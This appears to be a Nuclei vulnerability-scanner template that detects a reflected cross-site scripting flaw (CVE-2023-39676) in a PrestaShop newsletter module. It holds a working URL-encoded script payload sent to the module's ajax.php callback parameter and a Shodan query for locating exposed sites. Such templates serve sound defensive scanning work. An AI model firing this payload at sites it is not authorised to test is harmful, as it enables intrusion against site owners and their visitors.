nuclei-templates/http/cves/2023/CVE-2023-39676.yaml

34 lines
918 B
YAML

id: CVE-2023-39676
info:
name: PrestaShop XSS in fieldpopupnewsletter Module
author: meme-lord
severity: medium
description: |
Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.
reference:
- https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/
metadata:
max-request: 1
shodan-query: html:"fieldpopupnewsletter"
verified: "true"
tags: cve,cve2023,prestashop,xss
http:
- method: GET
path:
- "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "Invalid email"
condition: and
- type: status
status:
- 200